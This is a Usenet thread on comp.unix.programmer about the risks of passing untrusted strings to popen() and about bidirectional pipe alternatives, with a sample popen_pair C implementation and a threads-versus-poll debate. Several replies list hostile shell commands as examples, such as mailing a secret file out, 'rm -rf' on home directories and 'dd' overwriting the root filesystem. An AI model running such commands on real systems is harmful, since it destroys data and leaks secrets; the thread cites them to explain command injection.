Discussion:
Is popen() unsafe (with untrusted string) ?
(too old to reply)
Kenny McCormack
2021-01-07 19:19:56 UTC
Permalink
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).

Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).

(*) This would be like the |& functionality in gawk.

P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
--
"They say if you play a Microsoft CD backwards, you hear satanic messages.
Thats nothing, cause if you play it forwards, it installs Windows."
Richard Kettlewell
2021-01-07 19:37:19 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
mail ***@example.com < /home/gazelle/some/secret/file
rm -rf /home/gazelle/*
echo set -e >> /home/gazelle/.profile
mail -s "I will kill you" ***@domain
--
https://www.greenend.org.uk/rjk/
Jorgen Grahn
2021-01-07 21:40:12 UTC
Permalink
Post by Richard Kettlewell
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
rm -rf /home/gazelle/*
echo set -e >> /home/gazelle/.profile
I think questions about this /usually/ begin with an example like:

char buf[1000]; // never mind buffer overflows just now
sprintf(buf, "cat \"%s\"", str);
fd = popen(buf, "r");

Slightly more interesting that way.

/Jorgen
--
// Jorgen Grahn <grahn@ Oo o. . .
\X/ snipabacken.se> O o .
Jim Jackson
2021-01-07 19:46:02 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
Sorry not much help here but ...
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
I vaguely remember reference to p2open, but it's not on my linux box.
Google gives some references to solaris, Sun's^H^H^H^H Oracle's "Unix".
As I did work on solaris boxes a long time ago, that's where I must have
remembered it from.

Stack overflow has some discussions e.g.

https://stackoverflow.com/questions/3884103/can-popen-make-bidirectional-pipes-like-pipe-fork
Post by Kenny McCormack
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
j***@schily.net
2021-01-13 12:05:06 UTC
Permalink
This post might be inappropriate. Click to display it.
Barry Margolin
2021-01-07 20:20:08 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
It can be any command you could type at a terminal, and it's as
dangerous as you would be. So it can delete your files. If you're
permitted to run sudo, it could use that to execute commands as root (if
the perpetrator knows your password).
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
Google "popen2". But beware, it's easy to get deadlocked with something
like this. Many programs use stdio, and output is fully buffered when
writing to a pipe. So you could send something to the program, it
processes it and sends the output, but you never get it because the
program hasn't flushed its output buffer.
--
Barry Margolin, ***@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
Kaz Kylheku
2021-01-07 20:28:18 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
For instance, let str = "rm -rf ~".

Popen runs arbitrary shell commands.

Executing a shell command from an untrusted source is exactly the same
thing as logging in remotely to the system via SSH using a public
terminal, and then walking away so that anyone else can use the session.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.

For instance you could define your own scripting language (some safe
subset of the shell, probably). In this sandboxed language, unsafe things are
somehow impossible to write (in what ways, to be decided by your design).

You write a compiler for this language whose output is the regular shell
language, and that output is fed to popen(), system(), or to
execl("/bin/sh", "/bin/sh" "-c", str, ...) etc.

Even if that compiler outputs code that uses unsafe features of the
shell language, they are not used in unsafe ways, because the
translation preserves the safe semanics of the sandboxed language.

That's exactly the same like how we can trust the machine language
output by a safe high level language, even though it uses the same
vocabulary of unsafe instructions as an assembly language program.
--
TXR Programming Language: http://nongnu.org/txr
Kaz Kylheku
2021-01-07 20:49:01 UTC
Permalink
Post by Kaz Kylheku
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
For instance, let str = "rm -rf ~".
Popen runs arbitrary shell commands.
Executing a shell command from an untrusted source is exactly the same
thing as logging in remotely to the system via SSH using a public
terminal, and then walking away so that anyone else can use the session.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.
For instance you could define your own scripting language (some safe
subset of the shell, probably). In this sandboxed language, unsafe things are
somehow impossible to write (in what ways, to be decided by your design).
You write a compiler for this language whose output is the regular shell
language, and that output is fed to popen(), system(), or to
execl("/bin/sh", "/bin/sh" "-c", str, ...) etc.
Even if that compiler outputs code that uses unsafe features of the
shell language, they are not used in unsafe ways, because the
translation preserves the safe semanics of the sandboxed language.
Here is a trivial example.

Suppose we write a validator for this language.

expr -> expr '+' expr
| expr '-' expr
| expr '*' expr
| expr '/' expr
| number
| ident
| '(' expr ')'

ident := [a-zA-Z][a-zA-Z0-9]+

number := [-/+]?[0-9]+

If we validate the string to conform to this language, then it loks
like "a + 3 / 4" and whatnot.

We reject strings that don't conform.

Then we can safely do this---almost!

snprintf(big_buffer, .... "echo $(( %s ))", str);

/* check for truncation */

FILE *pipe = popen(big_buffer, "r");

We have defined a safe arithmetic language that we can use the shell to
execute. It won't clobber anything in our host environment.

However, it provides unfettered access to environment variables.

Suppose that the environment has a sensitive, integer-valued environment
variable SECRET_ENV_VAR. The untrusted user can supply that expression
and thereby learn the value of that variable.

Thus, suppose we take this idea further and define a more useful
language than just a calculator language. We have to guard against
leaking secrets from the environment.

One way would be namespacing. The variables in our language like ABC
or def would not translate into the same-named shell variables, but
into, say, sb_ABC and sb_def ("sb" == sandbox).

We could allow that language to have some environment manipulation.
For that we would provide some API. Only certain environment variables
would be loaded into sandboxed variables. For instance if we consider
TERM to be safe, we could pre-load sb_TERM with the value of TERM.
Likewise, we would have a carefully controlled "export" feature, which
only allows certain variables.

If ABC is an export-allowed variable, then the statement
"export ABC=42" in the sandboxed scripting language would
translate to "sb_ABC=42; export ABC=$sb_ABC". I.e. set the local
variable, and then also export the corresponding environment variable
which really has to be called ABC.

Our compiler would gather a list of all variables referenced by the
program, and then for that subset of those variables which are
"environment-allowed", it would emit an initial code block like:

sb_FOO=$FOO ; sb_BAR=$BAR ; ...

# BAZ is not on the whitelist so doesn't appear above

to fetch the value of all referenced whitelisted values from the
environment. Thus the language could access the env var $FOO and $BAR,
but $BAZ would appear uninitialized even if there is such an environment
variable.
--
TXR Programming Language: http://nongnu.org/txr
Kenny McCormack
2021-01-07 21:18:29 UTC
Permalink
In article <***@kylheku.com>,
Kaz Kylheku <563-365-***@kylheku.com> wrote:
...
Post by Kaz Kylheku
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.
Just for clarity, these topics are related, but not in the way you think.

I.e., I wasn't implying that a bidirectional popen() would somehow make it
possible to pass arbitrary strings to popen() and have it magically become
safe.

Rather, my (unstated) point was that if I had a bidirectional popen(),
then I could pass data into the sub-process via stdin, rather than on the
command line. This would, in the context of my actual use case (still as
of yet unstated in this thread), solve the real life use case problem.
--
If the automobile had followed the same development cycle as the
computer, a Rolls-Royce today would cost $100, get a million miles to
the gallon, and explode once every few weeks, killing everyone inside.
Kaz Kylheku
2021-01-07 21:35:21 UTC
Permalink
Post by Kenny McCormack
...
Post by Kaz Kylheku
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.
Just for clarity, these topics are related, but not in the way you think.
I.e., I wasn't implying that a bidirectional popen() would somehow make it
possible to pass arbitrary strings to popen() and have it magically become
safe.
Rather, my (unstated) point was that if I had a bidirectional popen(),
then I could pass data into the sub-process via stdin, rather than on the
command line. This would, in the context of my actual use case (still as
of yet unstated in this thread), solve the real life use case problem.
If the two approaches are viable alternatives, it means that you in fact
do not have a requirement to allow an untrusted user to execute
arbitrary program syntax that they specify.

Allowing a "canned" (therefore safely chosen by you) command to receive
input solves the problem of otherwise having to pass the input via
parameters (where they are treated as shell syntax).

If that is the situation, it's not too difficult to escape some data so
that can be passed as arguments. Wrap it in single quotes, and replace
every embedded single quote with '\''.
--
TXR Programming Language: http://nongnu.org/txr
Lew Pitcher
2021-01-07 20:29:49 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what
can go wrong?
Pretty much anything from simple command failure to deletion of the
entire system. Consider the effects of
popen(str,"r")
when
str = "false";

Consider the effects when
str = "rm -rf .";
or
str = "shutdown -h now";
or
str = "dd if=/dev/zero of=/ bs=1M";
Post by Kenny McCormack
Note: I'm not debating whether or not it is safe (I'm
pretty sure of the answer),
So long as you are pretty sure that an unaudited input is completely
unsafe...
Post by Kenny McCormack
but rather, I'm looking for an example of an
unsafe string (I.e., something an attacker would do).
See above.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some
library or something available) that is bidirectional
Not as a single function, no
Post by Kenny McCormack
- i.e., you can
both write and read from it - for example, you could run the Unix 'sort'
utility this way - send it some data, then read back the sorted result
(*).
popen() is a wrapper around fork() and exec(), and you can accomplish
bidirectionality by correctly invoking those primitives directly.
Post by Kenny McCormack
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
HTH
--
Lew Pitcher
"In Skills, We Trust"
Janis Papanagnou
2021-01-08 01:33:18 UTC
Permalink
On 07.01.2021 20:19, Kenny McCormack wrote:
[ snip already answered popen() question ]
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
(*) This would be like the |& functionality in gawk.
(or like '|&' in ksh)
Post by Kenny McCormack
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
(Not sure you intended this as a "pure C" question but since you
posted in CUS and we can do such things in [some] shells...)

The '<>' redirection in shells allows read/write. With respect to
your sort statement we have to differentiate whether the command is
fully buffered [externally] (but then you could as well serialize
the command) or whether random changes should be possible in the
R/W-opened file. Ksh allows positioning ('seek'ing) in the opened
file with the specific redirection operators <#((N)) and >#((N)) .

Janis
Casper H.S. Dik
2021-01-11 16:36:37 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
It depends whether the applications has additional privileges and/or the
user does not have access to a shell; e.g., the user is actually a web
application.

popen() can execute any command a user can through a shell.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.


There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for your to read but you are blocked
trying to write more. Using threads would fix that.

Casper
s***@grumpysods.com
2021-01-11 17:00:07 UTC
Permalink
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for your to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.
Rainer Weikusat
2021-01-12 17:53:09 UTC
Permalink
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for your to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
Nicolas George
2021-01-12 19:03:04 UTC
Permalink
Rainer Weikusat , dans le message
Post by Rainer Weikusat
Something like this is much simpler with threads which can block
individually.
Until you need some kind of timeout or external interrupt. POSIX threads and
file descriptor I/O do not work well together, it's a common mistake.
Scott Lurndal
2021-01-13 16:12:30 UTC
Permalink
Post by Nicolas George
Rainer Weikusat , dans le message
Post by Rainer Weikusat
Something like this is much simpler with threads which can block
individually.
Until you need some kind of timeout or external interrupt. POSIX threads and
file descriptor I/O do not work well together, it's a common mistake.
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.

There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.
Nicolas George
2021-01-13 18:23:10 UTC
Permalink
Post by Scott Lurndal
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.
Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?
Post by Scott Lurndal
There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.
That's exactly what I mean: you have threads, and you still need to use I/O
multiplexing.
Scott Lurndal
2021-01-13 19:24:10 UTC
Permalink
Post by Nicolas George
Post by Scott Lurndal
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.
Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?
Post by Scott Lurndal
There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.
That's exactly what I mean: you have threads, and you still need to use I/O
multiplexing.
No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).

For socket endpoints, I'll create a pipe(2) to use to notify the thread to exist and
the thread main loop will poll the pipe and the socket fd. The main code
will write a single byte to the pipe to terminate the poll, and the
thread will exit.

Once can certainly setup one or more threads to just do synchronous I/O on demand using a request
and completion queue (similar to most modern host controller hardware)
without using poll or select.
Nicolas George
2021-01-13 20:18:37 UTC
Permalink
Post by Scott Lurndal
No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).
Wow, that was a waste of time.
Post by Scott Lurndal
For socket endpoints, I'll create a pipe(2) to use to notify the thread to
exist and the thread main loop will poll the pipe and the socket fd. The
main code will write a single byte to the pipe to terminate the poll, and
the thread will exit.
So you know how to force threads to work with file descriptors despite the
fact they're not designed for. Good for you.
Kaz Kylheku
2021-01-13 19:51:18 UTC
Permalink
Post by Nicolas George
Post by Scott Lurndal
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.
I understand this as meaning that "to use threads with I/O effectively, we need
to use multiplexing mechanisms that are also usable by single-threaded programs
that don't know anything about threads".

I.e. threads (or at least POSIX threads) do not succeed in replacing mechanisms
for multiplexing events onto one thread such as timeouts, select/poll, async
I/O and whatever.
Post by Nicolas George
Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?
Yes, that can be a problem. I needed to do this in the kernel once,
and wrote it!

In the lmc-2.0 archive given here

http://www.kylheku.com/~kaz/lmc.html

See this function (in mutex.c):

/**
* Atomically give up the mutex and wait on the condition variable.
* Wake up if the specified timeout elapses, or if a signal is delivered.
* Additionally, also wait on the specified file descriptors to become
* ready, combining condition waiting with poll().
* KCOND_WAIT_SUCCESS means the condition was signaled, or one or more
* file descriptors are ready.
* Also, a negative value can be returned indicating an error!
* (The poll needs to dynamically allocate some memory for the wait table).
* The timeout is relative to the current time, specifying how long to sleep in
* jiffies (CPU clock ticks).
*/
int kcond_timed_wait_rel_poll(kcond_t *, kmutex_t *, long,
kcond_poll_t *, unsigned int);
--
TXR Programming Language: http://nongnu.org/txr
s***@grumpysods.com
2021-01-13 09:15:12 UTC
Permalink
On Tue, 12 Jan 2021 17:53:09 +0000
Post by s***@grumpysods.com
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for your to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with
threading
Post by s***@grumpysods.com
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
It really isn't. But if you only know how to use a hammer...

IMO threads should be avoided unless absolutely necessary as the downsides
generally outweigh the upsides but we have a generation of devs brought up
on Windows where threads are the go-to way to do in program multitasking due
to the limitations of that OS and its API.
Nicolas George
2021-01-13 12:38:00 UTC
Permalink
Post by s***@grumpysods.com
It really isn't. But if you only know how to use a hammer...
IMO threads should be avoided unless absolutely necessary as the downsides
generally outweigh the upsides but we have a generation of devs brought up
on Windows where threads are the go-to way to do in program multitasking due
to the limitations of that OS and its API.
Hear, hear.

POSIX threads are good for high performance. If you have a CPU-intensive
computation that can be parallelized, then use threads.

If you want to handle many network connections as fast as possible, then use
threads too. But not one thread per connection, one thread per processor,
and a poll()-like loop in each.
s***@grumpysods.com
2021-01-13 14:45:37 UTC
Permalink
On 13 Jan 2021 12:38:00 GMT
Post by Nicolas George
Post by s***@grumpysods.com
It really isn't. But if you only know how to use a hammer...
IMO threads should be avoided unless absolutely necessary as the downsides
generally outweigh the upsides but we have a generation of devs brought up
on Windows where threads are the go-to way to do in program multitasking due
to the limitations of that OS and its API.
Hear, hear.
POSIX threads are good for high performance. If you have a CPU-intensive
computation that can be parallelized, then use threads.
If you want to handle many network connections as fast as possible, then use
threads too. But not one thread per connection, one thread per processor,
and a poll()-like loop in each.
For absolute speed yes, threads are a solution. But I had an argument with
a project manager a few years ago about wanting to use multiprocess for a
mid load network server - select() -> fork() -> accept() etc - because it was
a bet the company system and we simply could not afford to have a bug in one
network session bring down the entire system. I won in the end, after
explaining to him what fork() and copy-on-write did since he'd never
developed on *nix in his life.
Rainer Weikusat
2021-01-13 16:35:35 UTC
Permalink
Post by s***@grumpysods.com
On Tue, 12 Jan 2021 17:53:09 +0000
Post by s***@grumpysods.com
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for your to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with
threading
Post by s***@grumpysods.com
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
It really isn't. But if you only know how to use a hammer...
It is and your assumption about me is wrong: I've implemented both in
the past and have written a lot more code structured around synchronous
I/O multiplexing loop than multithreaded code.

For the given case, "feeding input to the secondary program" can be
implemented with a thread (or a forked process, obviously) which doesn't
need to interact with anything else in the program. It just writes to
the file descriptor and will blocked by the kernel as necessary.

Another thread just reads whatever data becomes available and processes
it.

For instance, there's absolutely no need for any kind of fancy buffer
management, especially for partial writes, in this case.
Rainer Weikusat
2021-01-18 17:53:12 UTC
Permalink
Post by s***@grumpysods.com
On Tue, 12 Jan 2021 17:53:09 +0000
Post by s***@grumpysods.com
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for your to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with
threading
Post by s***@grumpysods.com
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
It really isn't. But if you only know how to use a hammer...
It is
For illustration: Main 'working function' for a program relaying data to
and from a AF_UNIX stream socket:

static void forward_data(int from, int to)
{
char buf[1024];
ssize_t rc_r, rc_w;

while (rc_r = read(from, buf, sizeof(buf)), rc_r > 0) {
rc_w = write(to, buf, rc_r);
rc_w != -1 || sys_die("write");
}

rc_r != -1 || sys_die("read");
}

This runs twice, from a 2nd thread and from main, and that's all of the
program.

Kenny McCormack
2021-01-12 01:35:11 UTC
Permalink
In article <5ffc7e95$0$300$***@news.xs4all.nl>,
Casper H.S. Dik <***@OrSPaMcle.COM> wrote:
...
Post by Casper H.S. Dik
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
Yes, I read about p2open on Solaris (Oracle whatever they are calling it
now) and it looks quite useful. Any chance there is a publicly available
version of either it (specifically p2open()) or libgen in general for Linux?
--
Hindsight is (supposed to be) 2020.

Trumpers, don't make the same mistake twice.
Don't shoot yourself in the feet - and everywhere else - again!.
Kaz Kylheku
2021-01-12 21:19:56 UTC
Permalink
["Followup-To:" header set to comp.unix.programmer.]
Post by Kenny McCormack
...
Post by Casper H.S. Dik
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
Yes, I read about p2open on Solaris (Oracle whatever they are calling it
now) and it looks quite useful. Any chance there is a publicly available
version of either it (specifically p2open()) or libgen in general for Linux?
Here, I just made one.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/socket.h>

typedef struct FILE_pair {
FILE *in, *out;
pid_t pid;
} FILE_pair;

static const FILE_pair error_pair = { NULL, NULL, -1 };

FILE_pair popen_pair(const char *command)
{
int in_pipe[2] = { -1, -1 }; /* from parent point of view */
int out_pipe[2] = { -1, -1 };
pid_t child;

if (pipe(in_pipe) == 0 && pipe(out_pipe) == 0 && (child = fork()) != -1) {
if (child != 0) {
FILE_pair fp;

fp.in = fdopen(in_pipe[0], "r");
fp.out = fdopen(out_pipe[1], "w");
fp.pid = child;

if (fp.in && fp.out) {
/* make output line buffered so we don't have to fflush
* all the time
*/
setvbuf(fp.out, NULL, _IOLBF, 0);
return fp;
}

if (fp.in)
fclose(fp.in);

if (fp.out)
fclose(fp.out);
} else {
/* read end of parent's output pipe is child's input */
dup2(out_pipe[0], STDIN_FILENO);
/* write end of parent's input pipe is child's output */
dup2(in_pipe[1], STDOUT_FILENO);

execl("/bin/sh", "/bin/sh", "-c", command, (char *) NULL);
abort();
}
}

if (child > 0)
kill(child, SIGKILL);
close(in_pipe[0]);
close(in_pipe[1]);
close(out_pipe[0]);
close(out_pipe[1]);
return error_pair;
}

int pclose_pair(FILE_pair fp)
{
int wstatus, result = -1;
fclose(fp.out);

if (waitpid(fp.pid, &wstatus, 0) != -1) {
if (WIFEXITED(wstatus))
result = WEXITSTATUS(wstatus);
}
fclose(fp.in);
return result;
}

int main(void)
{
FILE_pair fp = popen_pair("read foo; printf '%s\\n' $foo");
char buf[72]; // For posting this program to Usenet

if (fp.out != NULL) {
fputs("hello\n", fp.out);

if (fgets(buf, sizeof buf, fp.in))
fputs(buf, stdout);

printf("pipe exit status = %d\n", pclose_pair(fp));
return 0;
}

return EXIT_FAILURE;
}
Philip Guenther
2021-01-12 19:19:13 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
--
"They say if you play a Microsoft CD backwards, you hear satanic messages.
Thats nothing, cause if you play it forwards, it installs Windows."
Philip Guenther
2021-01-15 04:13:55 UTC
Permalink
On Thursday, January 7, 2021 at 11:20:00 AM UTC-8, Kenny McCormack wrote:
...
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
One classic (i.e., "decades old") and portable inside POSIX technique that solves a large subset of this problem space is to use a process sandwich, where you create two pipes, then fork twice with one child execing the target utility after some fd swizzling, with the other child serving as the writer/source and the original process being the reader/sink**. This simplifies things whenever the writer and reader operations are not so tightly coupled as to need to share state, the key idea being that running the writer and reader in separate processes eliminates the deadlock issues.

(I suppose this can be 'simplified' by only doing one pipe and fork for the writer, then using popen() for the utility, but that requires more fd swizzling to set up the stdio for the popen() and then revert it afterwards, but I've never seen this idiom written that way.)


This obviously doesn't work when the writer and reader share state. For example, if the process needs to run some non-trivial protocol over a TCP connection (like HTTP, or TLS) to receive the input and send back the output, possibly interleaved, then some way to share the necessary state across the fork would be necessary, which would probably be more complicated than just doing I/O multiplexing with poll() in one process.


Philip Guenther

** or the other way around, with the original process being the writer. The cases I've seen this used have all had the full input available from the start and wanted to carry on processing with the output, so making the writer the child was correct for them.
Kaz Kylheku
2021-01-15 08:24:10 UTC
Permalink
Post by Philip Guenther
...
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
One classic (i.e., "decades old") and portable inside POSIX technique
that solves a large subset of this problem space is to use a process
sandwich, where you create two pipes, then fork twice with one child
execing the target utility after some fd swizzling, with the other
child serving as the writer/source and the original process being the
reader/sink**.
E.g.

VAR=$(function | sort)

function runs in child process, sort in another, and the original
process captures the output, storing it in VAR.
--
TXR Programming Language: http://nongnu.org/txr
Loading...